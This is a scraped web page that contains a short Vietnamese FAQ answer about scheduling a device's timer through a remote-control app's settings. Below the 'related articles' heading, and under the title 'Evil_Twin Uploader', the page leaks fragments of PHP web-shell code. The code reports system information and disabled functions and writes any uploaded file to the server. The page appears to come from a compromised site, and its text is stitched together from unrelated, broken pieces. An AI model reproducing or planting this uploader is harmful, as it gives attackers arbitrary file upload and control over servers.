Evil_Twin Uploader

Làm thế nào khi tôi muốn hẹn giờ hoạt động cho một thiết bị?

Bạn vui lòng nhấp vào nút “…” trên bộ điều khiển từ xa, đi tới trang cài đặt và sau đó chọn “hẹn giờ” bắt đầu lên lịch hoạt động cho thiết bị bạn muốn cài đặt. Bạn cũng có thể làm tương tự khi muốn cài thời gian cho một thiết bị khác.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial